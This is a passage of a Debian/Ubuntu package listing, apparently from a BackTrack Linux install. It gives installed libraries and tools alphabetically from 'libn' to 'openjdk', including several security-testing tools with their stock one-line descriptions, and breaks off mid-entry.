libraries for nautilus components - runtime version ii libncp 2.2.6-7 shared library used by programs that use NetWare Core Protocol ii libncurses5 5.7+20090803-2ubuntu3 shared libraries for terminal handling ii libncurses5-dev 5.7+20090803-2ubuntu3 developer's libraries and docs for ncurses ii libncursesw5 5.7+20090803-2ubuntu3 shared libraries for terminal handling (wide character support) ii libneon27-gnutls 0.29.0-1 An HTTP and WebDAV client library (GnuTLS enabled) ii libnet-daemon-perl 0.43-1 Perl module for building portable Perl daemons easily ii libnet-dns-perl 0.65-1build1 Perform DNS queries from a Perl script ii libnet-ip-perl 1.25-2 Perl extension for manipulating IPv4/IPv6 addresses ii libnet-libidn-perl 0.12.ds-1 Perl bindings for GNU Libidn ii libnet-netmask-perl 1.9015-3 parse, manipulate and lookup IP network blocks ii libnet-pcap-perl 0.16-2 Perl binding to the LBL pcap packet capture library ii libnet-rawip-perl 0.25-1 Perl interface to lowlevel TCP/IP ii libnet-smtp-ssl-perl 1.01-2 SSL support for Net::SMTP ii libnet-snmp-perl 5.2.0-3 Script SNMP connections ii libnet-ssleay-perl 1.35-2ubuntu1 Perl module for Secure Sockets Layer (SSL) ii libnet1 1.1.4-2 library for the construction and handling of network packets ii libnet6-1.3-0 1:1.3.11-1 Network access framework for IPv4/IPv6 ii libnetpacket-perl 0.41.1-1 Modules to assemble/disassemble network packets at the protocol level ii libnetpbm10 2:10.0-12.1ubuntu1 Graphics conversion tools shared libraries ii libnewt0.52 0.52.10-5ubuntu1 Not Erik's Windowing Toolkit - text mode windowing with slang ii libnfsidmap2 0.23-2 An nfs idmapping library ii libnids1.21 1.23-1.1 IP defragmentation TCP segment reassembly library ii libnih-dbus1 1.0.1-1 NIH D-Bus Bindings Library ii libnih1 1.0.1-1 NIH Utility Library ii libnl1 1.1-5build1 library for dealing with netlink sockets ii libnmap-parser-perl 1.05-2 parse nmap scan data with perl ii libnotify1 0.4.5-1ubuntu4 sends desktop notifications to a notification daemon ii libnspr4-0d 4.8.6-0ubuntu0.10.04.2 NetScape Portable Runtime Library ii libnss-mdns 0.10-3ubuntu4 NSS module for Multicast DNS name resolution ii libnss3-1d 3.12.9+ckbi-1.82-0ubuntu0.10.04.1 Network Security Service libraries ii libntfs-3g75 1:2010.3.6-1ubuntu1 ntfs-3g filesystem in userspace (FUSE) library ii libntfs10 2.0.0-1ubuntu4 library that provides common NTFS access functions ii libobexftp0 0.23-1 object exchange file transfer library ii libogg0 1.1.4~dfsg-2 Ogg bitstream library ii liboil0.3 0.3.16-1ubuntu2 Library of Optimized Inner Loops ii liboop4 1.0-6 Event loop management library ii libopenal1 1:1.12.854-0ubuntu1~lucid1 Software implementation of the OpenAL API (shared library) ii libopenexr6 1.6.1-4.1 runtime files for the OpenEXR image library ii libopenobex1 1.5-2build1 OBEX protocol library ii libopenssl-ruby 4.2-2~uorppa0 OpenSSL interface for Ruby ii libopenssl-ruby1.8 1.8.7.249-2 OpenSSL interface for Ruby 1.8 ii libopenssl-ruby1.9.2 1.9.2.z1-1ppa1~lucid OpenSSL interface for Ruby 1.9.2 ii liborbit2 1:2.14.18-0.1 libraries for ORBit2 - a CORBA ORB ii libpam-ck-connector 0.4.1-3ubuntu2 ConsoleKit PAM module ii libpam-gnome-keyring 2.92.92.is.2.30.3-0ubuntu1.1 PAM module to unlock the GNOME keyring upon login ii libpam-modules 1.1.1-2ubuntu5.1 Pluggable Authentication Modules for PAM ii libpam-runtime 1.1.1-2ubuntu5.1 Runtime support for the PAM library ii libpam0g 1.1.1-2ubuntu5.1 Pluggable Authentication Modules library ii libpanel-applet2-0 1:2.30.2-0ubuntu0.2 library for GNOME Panel applets ii libpango1.0-0 1.28.0-0ubuntu2.2 Layout and rendering of internationalized text ii libpango1.0-common 1.28.0-0ubuntu2.2 Modules and configuration files for the Pango ii libpangomm-1.4-1 2.26.2-0ubuntu1 C++ Wrapper for pango (shared libraries) ii libpaper-utils 1.1.23+nmu1build1 library for handling paper characteristics (utilities) ii libpaper1 1.1.23+nmu1build1 library for handling paper characteristics ii libparse-debianchangelog-perl 1.1.1-2ubuntu2 parse Debian changelogs and output them in other formats ii libparted0debian1 2.2-5ubuntu5.1 The GNU Parted disk partitioning shared library ii libpcap-dev 1.0.0-6 development library for libpcap (transitional package) ii libpcap0.8 1.0.0-6 system interface for user-level packet capture ii libpcap0.8-dev 1.0.0-6 development library and header files for libpcap0.8 ii libpci3 1:3.0.0-4ubuntu17 Linux PCI Utilities (shared library) ii libpciaccess0 0.11.0-1 Generic PCI access library for X ii libpcre3 7.8-3build1 Perl 5 Compatible Regular Expression Library - runtime files ii libpcsclite1 1.5.3-1ubuntu4.2 Middleware to access a smart card using PC/SC (library) ii libperl5.10 5.10.1-8ubuntu2.1 shared Perl library ii libphonon4 4:4.7.0really4.4.2- 0ubuntu1~lucid1~ppa1 the core library of the Phonon multimedia framework ii libpixman-1-0 0.16.4-1ubuntu2 pixel-manipulation library for X and cairo ii libpkcs11-helper1 1.07-1build1 library that simplifies the interaction with PKCS#11 ii libplist1 1.1-1ubuntu1 Library for handling Apple binary and XML property lists ii libplrpc-perl 0.2020-2 Perl extensions for writing PlRPC servers and clients ii libplymouth2 0.8.2-2ubuntu2.2 graphical boot animation and logger - shared libraries ii libpng12-0 1.2.42-1ubuntu2.1 PNG library - runtime ii libpolkit-agent-1-0 0.96-2ubuntu0.1 PolicyKit Authentication Agent API ii libpolkit-backend-1-0 0.96-2ubuntu0.1 PolicyKit backend API ii libpolkit-gobject-1-0 0.96-2ubuntu0.1 PolicyKit Authorization API ii libpoppler5 0.12.4-0ubuntu5.1 PDF rendering library ii libpopt0 1.15-1 lib for parsing cmdline parameters ii libportaudio0 18.1-7.1 Portable audio I/O - shared library ii libportaudio2 19+svn20090620-0ubuntu2 Portable audio I/O - shared library ii libpq5 8.4.8-0ubuntu0.10.04 PostgreSQL C client library ii libprelude2 1.0.0~rc1-1 Security Information Management System [ Base library ] ii libproxy0 0.3.1-1ubuntu1 automatic proxy configuration management library (shared) ii libpst4 0.6.41-0ubuntu4 Shared library needed by the readpst utilities, and ii libpthread-stubs0 0.3-2 pthread stubs not provided by native libc ii libpthread-stubs0-dev 0.3-2 pthread stubs not provided by native libc, development files ii libpulse-browse0 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 PulseAudio client libraries (zeroconf support) ii libpulse-mainloop-glib0 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 PulseAudio client libraries (glib support) ii libpulse0 1:0.9.22~0.9.21+stable-queue-32- g8478-0ubuntu14.1 PulseAudio client libraries ii libpython2.6 2.6.5-1ubuntu6 Shared Python runtime library (version 2.6) ii libqt3-mt 3:3.3.8-b-6ubuntu2 Qt GUI Library (Threaded runtime version), Version 3 ii libqt4-dbus 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 D-Bus module ii libqt4-designer 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 designer module ii libqt4-help 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 help module ii libqt4-network 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 network module ii libqt4-script 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 script module ii libqt4-scripttools 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 script tools module ii libqt4-sql 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 SQL module ii libqt4-sql-mysql 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 MySQL database driver ii libqt4-svg 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 SVG module ii libqt4-test 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 test module ii libqt4-xml 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 XML module ii libqt4-xmlpatterns 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 XML patterns module ii libqtcore4 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 core module ii libqtgui4 4:4.7.0-0ubuntu2~lucid1~ppa2 Qt 4 GUI module ii libqtwebkit4 2.0.0-0ubuntu1~lucid1~ppa1 Web content engine library for Qt ii libqwt5-qt4 5.2.0-1build1 Qt4 widgets library for technical applications (runtime) ii librarian0 0.8.1-4ubuntu1 Documentation meta-data library (library package) ii libraw1394-11 2.0.4-1ubuntu2 library for direct access to IEEE 1394 bus (aka FireWire) ii libreadline-ruby 4.2-2~uorppa0 Readline interface for Ruby ii libreadline-ruby1.8 1.8.7.249-2 Readline interface for Ruby 1.8 ii libreadline-ruby1.9.2 1.9.2.z1-1ppa1~lucid Readline interface for Ruby 1.9.2 ii libreadline5 5.2-7build1 GNU readline and history libraries, run-time libraries ii libreadline5-dev 5.2-7build1 GNU readline and history libraries, development files ii libreadline6 6.1-1 GNU readline and history libraries, run-time libraries ii librpc-xml-perl 0.72-1 Perl module implementation of XML-RPC ii librpcsecgss3 0.19-2 allows secure rpc communication using the rpcsec_gss protocol ii librpm0 4.7.2-1lbuild1 RPM shared library ii librpmio0 4.7.2-1lbuild1 RPM IO shared library ii librrd4 1.3.8-1ubuntu1 Time-series data storage and display system (runtime library) ii librsvg2-2 2.26.3-0ubuntu1 SAX-based renderer library for SVG files (runtime) ii librsvg2-common 2.26.3-0ubuntu1 SAX-based renderer library for SVG files (extra runtime) ii libruby1.8 1.8.7.249-2 Libraries necessary to run Ruby 1.8 ii libruby1.9.2 1.9.2.z1-1ppa1~lucid Libraries necessary to run Ruby 1.9.2 ii libruli4 0.33-1.1 Library for easily querying DNS SRV records ii libsamplerate0 0.1.7-3 Audio sample rate conversion library ii libsasl2-2 2.1.23.dfsg1-5ubuntu1 Cyrus SASL - authentication abstraction library ii libsasl2-modules 2.1.23.dfsg1-5ubuntu1 Cyrus SASL - pluggable authentication modules ii libschroedinger-1.0-0 1.0.9.is.1.0.8-0ubuntu1 library for encoding/decoding of Dirac video streams ii libsdl-image1.2 1.2.10-1 image loading library for Simple DirectMedia Layer 1.2 ii libsdl1.2debian 1.2.14-4ubuntu1.1 Simple DirectMedia Layer ii libsdl1.2debian-alsa 1.2.14-4ubuntu1.1 Simple DirectMedia Layer (with X11 and ALSA options) ii libselinux1 2.0.89-4 SELinux runtime shared libraries ii libsensors4 1:3.1.2-2 library to read temperature/voltage/fan sensors ii libsepol1 2.0.40-2 SELinux library for manipulating binary security policies ii libsexy2 0.1.11-2build2 collection of additional GTK+ widgets - library ii libsgutils2-2 1.28-2 utilities for working with generic SCSI devices (shared libraries) ii libshout3 2.2.2-5ubuntu1 MP3/Ogg Vorbis broadcast streaming library ii libsigc++-2.0-0c2a 2.2.4.2-1 type-safe Signal Framework for C++ - runtime ii libslang2 2.2.2-2ubuntu1 The S-Lang programming library - runtime version ii libslp1 1.2.1-7.6ubuntu0.1 OpenSLP libraries ii libsm-dev 2:1.1.1-1 X11 Session Management library (development headers) ii libsm6 2:1.1.1-1 X11 Session Management library ii libsmbclient 2:3.4.7~dfsg-1ubuntu3.6 shared library for communication with SMB/CIFS servers ii libsmi2-common 0.4.8+dfsg2-2 a library to access SMI MIB information - MIB module files ii libsmi2ldbl 0.4.8+dfsg2-2 library to access SMI MIB information ii libsndfile1 1.0.21-2 Library for reading/writing audio files ii libsnmp-base 5.4.2.1~dfsg0ubuntu1-0ubuntu2.1 SNMP (Simple Network Management Protocol) MIBs and documentation ii libsnmp15 5.4.2.1~dfsg0ubuntu1-0ubuntu2.1 SNMP (Simple Network Management Protocol) library ii libsoup-gnome2.4-1 2.30.2-0ubuntu0.1 an HTTP library implementation in C -- GNOME support library ii libsoup2.4-1 2.30.2-0ubuntu0.1 an HTTP library implementation in C -- Shared library ii libsox-fmt-all 14.3.0-1.1build1 All SoX format libraries ii libsox-fmt-alsa 14.3.0-1.1build1 SoX alsa format I/O library ii libsox-fmt-ao 14.3.0-1.1build1 SoX Libao format I/O library ii libsox-fmt-base 14.3.0-1.1build1 Minimal set of SoX format libraries ii libsox-fmt-ffmpeg 14.3.0-1.1build1 SoX ffmpeg format library ii libsox-fmt-mp3 14.3.0-1.1build1 SoX MP3 format library ii libsox-fmt-oss 14.3.0-1.1build1 SoX OSS format I/O library ii libsox-fmt-pulse 14.3.0-1.1build1 SoX PulseAudio format I/O library ii libsox1a 14.3.0-1.1build1 SoX library of audio effects and processing ii libspeex1 1.2~rc1-1ubuntu1 The Speex codec runtime library ii libspeexdsp1 1.2~rc1-1ubuntu1 The Speex extended runtime library ii libsqlite0 2.8.17-6build2 SQLite shared library ii libsqlite3-0 3.6.22-1 SQLite 3 shared library ii libsqlite3-dev 3.6.22-1 SQLite 3 development files ii libsqlite3-ruby 1.2.4-2.1 SQLite3 interface for Ruby ii libsqlite3-ruby1.8 1.2.4-2.1 SQLite3 interface for Ruby 1.8 ii libss2 1.41.11-1ubuntu2.1 command-line interface parsing library ii libssh-4 0.4.2-1ubuntu1 A tiny C SSH library ii libssh2-1 1.2.2-1 SSH2 client-side library ii libssl0.9.8 0.9.8k-7ubuntu8.6 SSL shared libraries ii libstartup-notification0 0.10-1build1 library for program launch feedback (shared library) ii libstdc++6 4.4.3-4ubuntu5 The GNU Standard C++ Library v3 ii libstdc++6-4.4-dev 4.4.3-4ubuntu5 The GNU Standard C++ Library v3 (development files) ii libstree 0.4.3-bt0 A generic suffix tree library. ii libsub-name-perl 0.04-1build1 Assigns a new name to referenced sub ii libsvn1 1.6.6dfsg-2ubuntu1.2 Shared libraries used by Subversion ii libsybdb5 0.82-6build1 libraries for connecting to MS SQL and Sybase SQL servers ii libsys-hostname-long-perl 1.4-2 Figure out the long (fully-qualified) hostname ii libsysfs2 2.1.0-6 interface library to sysfs ii libtag1-vanilla 1.6.3-0ubuntu1 TagLib Audio Meta-Data Library (Vanilla flavour) ii libtag1c2a 1.6.3-0ubuntu1 TagLib Audio Meta-Data Library ii libtalloc2 2.0.1-1 hierarchical pool based memory allocator ii libtasn1-3 2.4-1 Manage ASN.1 structures (runtime) ii libtdb1 1.2.0-1 Trivial Database - shared library ii libterm-readkey-perl 2.30-4build1 A perl module for simple terminal control ii libterm-readline-gnu-perl 1.19-2 Perl extension for the GNU Readline/History Library ii libtext-charwidth-perl 0.04-6 get display widths of characters on the terminal ii libtext-csv-perl 1.16-1 comma-separated values manipulator (using XS or PurePerl) ii libtext-csv-xs-perl 0.70-1 Perl C/XS module to process Comma-Separated Value files ii libtext-iconv-perl 1.7-2 converts between character sets in Perl ii libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap ii libthai-data 0.1.13-1build1 Data files for Thai language support library ii libthai0 0.1.13-1build1 Thai language support library ii libtheora0 1.1.1+dfsg.1-3 The Theora Video Compression Codec ii libtidy-0.99-0 20091223cvs-1 HTML syntax checker and reformatter - library ii libtie-ixhash-perl 1.21-2 ordered associative arrays for Perl ii libtiff4 3.9.2-2ubuntu0.7 Tag Image File Format (TIFF) library ii libtimedate-perl 1.1900-1 Time and date functions for Perl ii libtre5 0.8.0-2 regexp matching library with approximate matching ii libts-0.0-0 1.0-7build1 touch screen library ii libudev0 151-12.3 udev library ii libumfpack5.4.0 1:3.4.0-1ubuntu3 sparse LU factorization library ii libunique-1.0-0 1.1.6-1ubuntu2 Library for writing single instance applications - shared libraries ii libupower-glib1 0.9.1-1 abstraction for power management - shared library ii liburi-perl 1.52-1 module to manipulate and access URI strings ii libusb-0.1-4 2:0.1.12-14ubuntu0.2 userspace USB programming library ii libusb-1.0-0 2:1.0.6-1 userspace USB programming library ii libusbmuxd1 1.0.2-1ubuntu2 USB multiplexor daemon for iPhone and iPod Touch devices - library ii libuuid1 2.17.2-0ubuntu1.10.04.2 Universally Unique ID library ii libv4l-0 0.6.4-1ubuntu1 Collection of video4linux support libraries ii libvisual-0.4-0 0.4.0-2.1+ubuntu2 Audio visualization framework ii libvisual-0.4-plugins 0.4.0.dfsg.1-2ubuntu5 Audio visualization framework plugins ii libvorbis0a 1.2.3-3ubuntu1 The Vorbis General Audio Compression Codec (Decoder library) ii libvorbisenc2 1.2.3-3ubuntu1 The Vorbis General Audio Compression Codec (Encoder library) ii libvorbisfile3 1.2.3-3ubuntu1 The Vorbis General Audio Compression Codec (High Level API) ii libvte-common 1:0.23.5-0ubuntu1.1 Terminal emulator widget for GTK+ 2.0 - common files ii libvte9 1:0.23.5-0ubuntu1.1 Terminal emulator widget for GTK+ 2.0 - runtime files ii libwavpack1 4.60.1-1 an audio codec (lossy and lossless) - library ii libwbclient0 2:3.4.7~dfsg-1ubuntu3.6 Samba winbind client library ii libwhisker2-perl 2.4-1 Perl module geared for HTTP testing ii libwmf0.2-7 0.2.8.4-6.1ubuntu2 Windows metafile conversion library ii libwnck-common 1:2.30.0-0ubuntu1 Window Navigator Construction Kit - common files ii libwnck22 1:2.30.0-0ubuntu1 Window Navigator Construction Kit - runtime files ii libwrap0 7.6.q-18 Wietse Venema's TCP wrappers library ii libwww-mechanize-perl 1.58-1 module to automate interaction with websites ii libwww-perl 5.834-1ubuntu0.1 Perl HTTP/WWW client/server library ii libwxbase2.8-0 2.8.10.1-0ubuntu1.2 wxBase library (runtime) - non-GUI support classes of wxWidgets toolkit ii libwxgtk2.8-0 2.8.10.1-0ubuntu1.2 wxWidgets Cross-platform C++ GUI toolkit (GTK+ runtime) ii libx11-6 2:1.3.2-1ubuntu3 X11 client-side library ii libx11-data 2:1.3.2-1ubuntu3 X11 client-side library ii libx11-dev 2:1.3.2-1ubuntu3 X11 client-side library (development headers) ii libx86-1 1.1+ds1-6 x86 real-mode library ii libxapian15 1.0.18-1 Search engine library ii libxau-dev 1:1.0.5-1 X11 authorisation library (development headers) ii libxau6 1:1.0.5-1 X11 authorisation library ii libxaw7 2:1.0.7-1 X11 Athena Widget library ii libxcb-atom1 0.3.6-1build1 utility libraries for X C Binding -- atom ii libxcb-aux0 0.3.6-1build1 utility libraries for X C Binding -- aux ii libxcb-event1 0.3.6-1build1 utility libraries for X C Binding -- event ii libxcb-render-util0 0.3.6-1build1 utility libraries for X C Binding -- render-util ii libxcb-render0 1.5-2 X C Binding, render extension ii libxcb-shape0 1.5-2 X C Binding, shape extension ii libxcb-shm0 1.5-2 X C Binding, shm extension ii libxcb-xv0 1.5-2 X C Binding, xv extension ii libxcb1 1.5-2 X C Binding ii libxcb1-dev 1.5-2 X C Binding, development files ii libxcomposite1 1:0.4.1-1 X11 Composite extension library ii libxcursor1 1:1.1.10-1 X cursor management library ii libxdamage1 1:1.1.2-1 X11 damaged region extension library ii libxdmcp-dev 1:1.0.3-1 X11 authorisation library (development headers) ii libxdmcp6 1:1.0.3-1 X11 Display Manager Control Protocol library ii libxext6 2:1.1.1-2 X11 miscellaneous extension library ii libxfixes3 1:4.0.4-1 X11 miscellaneous 'fixes' extension library ii libxfont1 1:1.4.1-1 X11 font rasterisation library ii libxft2 2.1.14-1ubuntu1 FreeType-based font drawing library for X ii libxi6 2:1.3-3 X11 Input extension library ii libxine1 1.1.17-1ubuntu3 the xine video/media player library, meta-package ii libxine1-bin 1.1.17-1ubuntu3 the xine video/media player library, binary files ii libxine1-console 1.1.17-1ubuntu3 libaa/libcaca/framebuffer/directfb related plugins for libxine1 ii libxine1-misc-plugins 1.1.17-1ubuntu3 Input, audio output and post plugins for libxine1 ii libxine1-x 1.1.17-1ubuntu3 X desktop video output plugins for libxine1 ii libxinerama1 2:1.1-2 X11 Xinerama extension library ii libxkbfile1 1:1.0.6-1 X11 keyboard file manipulation library ii libxklavier16 5.0-0ubuntu1 X Keyboard Extension high-level API ii libxml-libxml-perl 1.70.ds-1 Perl interface to the libxml2 library ii libxml-namespacesupport-perl 1.09-3 Perl module for supporting simple generic namespaces ii libxml-parser-perl 2.36-1.1build3 Perl module for parsing XML files ii libxml-sax-expat-perl 0.40-1 Perl module for a SAX2 driver for Expat (XML::Parser) ii libxml-sax-perl 0.96+dfsg-2 Perl module for using and building Perl SAX2 XML processors ii libxml-simple-perl 2.18-3 Perl module for reading and writing XML ii libxml-twig-perl 1:3.32-3ubuntu1 Perl module for processing huge XML documents in tree mode ii libxml-writer-perl 0.605-1 Perl module for writing XML documents ii libxml-xpath-perl 1.13-7 Perl module for processing XPath ii libxml2 2.7.6.dfsg-1ubuntu1.1 GNOME XML library ii libxml2-dev 2.7.6.dfsg-1ubuntu1.1 Development files for the GNOME XML library ii libxml2-utils 2.7.6.dfsg-1ubuntu1.1 XML utilities ii libxmu6 2:1.0.5-1 X11 miscellaneous utility library ii libxmuu1 2:1.0.5-1 X11 miscellaneous micro-utility library ii libxpm4 1:3.5.8-1 X11 pixmap library ii libxrandr2 2:1.3.0-3 X11 RandR extension library ii libxrender1 1:0.9.5-1 X Rendering Extension client library ii libxres1 2:1.0.4-1 X11 Resource extension library ii libxslt1-dev 1.1.26-1ubuntu1 XSLT processing library - development kit ii libxslt1.1 1.1.26-1ubuntu1 XSLT processing library - runtime library ii libxss1 1:1.2.0-2 X11 Screen Saver extension library ii libxt-dev 1:1.0.7-1 X11 toolkit intrinsics library (development headers) ii libxt6 1:1.0.7-1 X11 toolkit intrinsics library ii libxtst6 2:1.1.0-2 X11 Testing -- Resource extension library ii libxv1 2:1.0.5-1 X11 Video extension library ii libxvmc1 2:1.0.5-1ubuntu1 X11 Video extension library ii libxxf86dga1 2:1.1.1-2 X11 Direct Graphics Access extension library ii libxxf86misc1 1:1.0.2-1 X11 XFree86 miscellaneous extension library ii libxxf86vm1 1:1.1.0-2 X11 XFree86 video mode extension library ii libyaml-0-2 0.1.3-1 Fast YAML 1.1 parser and emitter library ii libyaml-perl 0.71-1 YAML Ain't Markup Language ii libyaml-syck-perl 1.07-1build1 fast, lightweight YAML loader and dumper ii linux-firmware 2.0-bt4 Linux Kernel Firmware ii linux-image 1.1-bt1 BackTrack Linux Kernel Image Virtual Package rc linux-image-2.6.32-28-generic-pae 2.6.32-28.55 Linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.38 2.6.38-10.00.Custom Linux kernel binary image for version 2.6.38 rc linux-image-2.6.38-rc7 2.6.38-rc7-10.00.Custom Linux kernel binary image for version 2.6.38-rc7 rc linux-image-2.6.38-rc8 2.6.38-rc8-10.00.Custom Linux kernel binary image for version 2.6.38-rc8 ii linux-libc-dev 2.6.32-29.58 Linux Kernel Headers for development ii linux-sound-base 1.0.22.1+dfsg-0ubuntu3 base package for ALSA and OSS sound systems ii linux-source 1.1-bt1 BackTrack Linux Kernel Source Virtual Package ii linux-source-2.6.38 2.6.38-10.00.Custom Linux kernel source for version 2.6.38 rc linux-source-2.6.38-rc7 2.6.38-rc7-10.00.Custom Linux kernel source for version 2.6.38-rc7 rc linux-source-2.6.38-rc8 2.6.38-rc8-10.00.Custom Linux kernel source for version 2.6.38-rc8 ii list-urls 3.0-bt2 Extract URLS from a web page. ii lm-sensors 1:3.1.2-2 utilities to read temperature/voltage/fan sensors ii lmodern 2.004.1-3 scalable PostScript and OpenType fonts based on Computer Modern ii localechooser-data 2.12ubuntu3 Lists of locales supported by the installer ii locales 2.11+git20100304-3 common files for locale support ii lockfile-progs 0.1.13ubuntu1 Programs for locking and unlocking files and mailboxes ii login 1:4.1.4.2-1ubuntu2.2 system login tools ii logrotate 3.7.8-4ubuntu2.1 Log rotation utility ii lsb-base 4.0-0ubuntu8 Linux Standard Base 4.0 init script functionality ii lsb-release 4.0-0ubuntu8 Linux Standard Base version reporting utility ii lshw 02.14-1build1 information about hardware configuration ii lsof 4.81.dfsg.1-1build1 List open files ii ltrace 0.5.3-2ubuntu3 Tracks runtime library calls in dynamically linked programs ii luatex 0.50.0-1 next generation TeX engine ii lzma 4.43-14ubuntu2 Compression method of 7z format in 7-Zip program ii m4 1.4.13-3 a macro processing language ii macchanger 1.5.0-bt2 A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces. ii magicrescue 1.19-bt0 Scans a block device for file types it knows how to recover and calls an external program to extract them. ii magictree r1492-bt1 A penetration tester productivity tool which allows easy and straightforward data consolidation ii make 3.81-7ubuntu1 An utility for Directing compilation. ii makedev 2.3.1-89ubuntu1 creates device files in /dev ii maltego 3.0-bt4 OSINT software ii man-db 2.5.7-2ubuntu1 on-line manual pager ii manpages 3.23-1 Manual pages about using a GNU/Linux system ii manpages-dev 3.23-1 Manual pages about using GNU/Linux for development ii mantra 0.01-bt0 Mantra is a security framework which can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, ii mawk 1.3.3-15ubuntu2 a pattern scanning and text processing language ii md5deep 3.4-bt0 A set of programs to compute MD5, SHA-1, SHA-256, Tiger, or Whirlpool message digests on an arbitrary number of files. ii mdbtools 0.5.99.0.6pre1.0.20051109-6 JET / MS Access database (MDB) tools ii mdk3 6.0-bt1 MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses using the oslib of aircrack-ng. ii medusa 2.0-bt4 parallel network login auditor ii memtest86+ 4.00-2ubuntu3 thorough real-mode memory tester ii menu 2.1.43ubuntu1 generates programs menu for all menu-aware applications ii mesa-utils 7.7.1-1ubuntu3 Miscellaneous Mesa GL utilities ii metacity 1:2.30.1-0ubuntu1.1 lightweight GTK+ window manager ii metacity-common 1:2.30.1-0ubuntu1.1 shared files for the Metacity window manager ii metagoofil 2.0-bt1 Metagoofil is a tool for extracting metadata of public documents (pdf,doc,xls,ppt) availables in the target websites. ii mime-support 3.48-1ubuntu1 MIME files 'mime.types' & 'mailcap', and support programs ii min12xxw 0.0.9-3ubuntu2 Printer driver for KonicaMinolta PagePro 1[234]xxW ii mingw 3.14-bt0 A minimalist development environment for native Microsoft Windows applications. ii miranda 1.0-bt0 Miranda is a Python-based Universal Plug-N-Play client application designed to discover, query and interact with UPNP devices, particularly Internet Gatew ii miredo 1.2.3-bt5 Miredo is an open-source Teredo IPv6 tunneling software, for Linux and the BSD operating systems. It includes functional implementations of all components ii missidentify 1.0-bt0 Miss Identify is a program to find Win32 applications. ii mlocate 0.22.2-1ubuntu1 quickly find files on the filesystem based on their name ii module-init-tools 3.11.1-2ubuntu1 tools for managing Linux kernel modules ii mopest 2.0-bt0 PHP web vulnerability scanner. ii mork.pl 1.0-bt0 This script lets you extract the URLs from your Mozilla history file, sorted by last access time. ii mount 2.17.2-0ubuntu1.10.04.2 Tools for mounting and manipulating filesystems ii mountall 2.15.3 filesystem mounting tool ii mousetweaks 2.30.0-0ubuntu1 mouse accessibility enhancements for the GNOME desktop ii mpg123 1.12.1-0ubuntu1 MPEG layer 1/2/3 audio player ii mtools 4.0.10-1ubuntu1 Tools for manipulating MSDOS files ii mtr-tiny 0.75-2build1 Full screen ncurses traceroute tool ii mutter 2.28.1~git20091208-1ubuntu7 lightweight GTK+ window manager ii mutter-common 2.28.1~git20091208-1ubuntu7 shared files for the Mutter window manager ii mysql-client-5.1 5.1.41-3ubuntu12.10 MySQL database client binaries ii mysql-client-core-5.1 5.1.41-3ubuntu12.10 MySQL database core client binaries ii mysql-common 5.1.41-3ubuntu12.10 MySQL database common files (e.g. /etc/mysql/my.cnf) ii mysql-server 5.1.41-3ubuntu12.10 MySQL database server (metapackage depending on the latest version) ii mysql-server-5.1 5.1.41-3ubuntu12.10 MySQL database server binaries ii mysql-server-core-5.1 5.1.41-3ubuntu12.10 MySQL database core server files ii nano 2.2.2-1 small, friendly text editor inspired by Pico ii nasm 2.07-1 General-purpose x86 assembler ii nautilus 1:2.31.1-0ubuntu2~ppa92 file manager and graphical shell for GNOME ii nautilus-data 1:2.31.1-0ubuntu2~ppa92 data files for nautilus ii nbtscan 1.5.1a-bt2 NBTscan is a program for scanning IP networks for NetBIOS name information. ii ncrack 0.4-bt0 Ncrack is a high-speed network authentication cracking tool. ii ncurses-base 5.7+20090803-2ubuntu3 basic terminal type definitions ii ncurses-bin 5.7+20090803-2ubuntu3 terminal-related programs and man pages ii nessus 4.4.1-bt5 Nessus vulnerability scanner by Tenable ii net-tools 1.60-23ubuntu2 The NET-3 networking toolkit ii netbase 4.35ubuntu3 Basic TCP/IP networking system ii netcat 1.10-38 TCP/IP swiss army knife -- transitional package ii netcat-traditional 1.10-38 TCP/IP swiss army knife ii netdiscover 0.3beta6-bt4 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. I ii netifera 1.0-bt4 Netifera is a new modular open source platform for creating network security tools. ii netmask 2.3.10-bt3 Tool for generating terse netmasks. ii netpbm 2:10.0-12.1ubuntu1 Graphics conversion tools between image formats ii nfs-common 1:1.2.0-4ubuntu4.1 NFS support files common to client and server ii ngrep 1.45.ds2-9 grep for network traffic ii nikto 2.1.4-bt4 Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentiall ii nmap 5.51-bt8 NMAP port and vulnerability scanner ii notification-daemon 0.4.0-2ubuntu2 a daemon that displays passive pop-up notifications ii ntfs-3g 1:2010.3.6-1ubuntu1 read-write NTFS driver for FUSE ii ntfsprogs 2.0.0-1ubuntu4 tools for doing neat things in NTFS partitions from Linux ii ntpdate 1:4.2.4p8+dfsg-1ubuntu2.1 client for setting system time from NTP servers ii obex-data-server 0.4.5-1 D-Bus service for OBEX client and server side functionality ii obexd 0.40-bt0 OBEX connectivity. Client and Server. ii obexftp 0.23-1 file transfer utility for devices that use the OBEX protocol ii oclhashcat 0.25-bt0 GPU based password cracker with nvidia and ati support ii oclhashcat+ 0.04-bt2 GPU based password cracker with crypt md5, DES and Apache MD5 support and a enhanced rule engine. ii oclhashcat-lite 0.05-bt0 Very fast single hash GPU based password cracker ii ohrwurm 0.1-bt0 ohrwurm is a simple RTP fuzzer. ii oinkmaster 2.0-2ubuntu1 Snort rules manager ii ollydbg 2.01-bt2 Windows Debugger Ollydbg 2.01 ii onesixtyone 0.3.2-bt4 Fast SNMP scanner and bruteforce tool ii openjdk-6-jdk 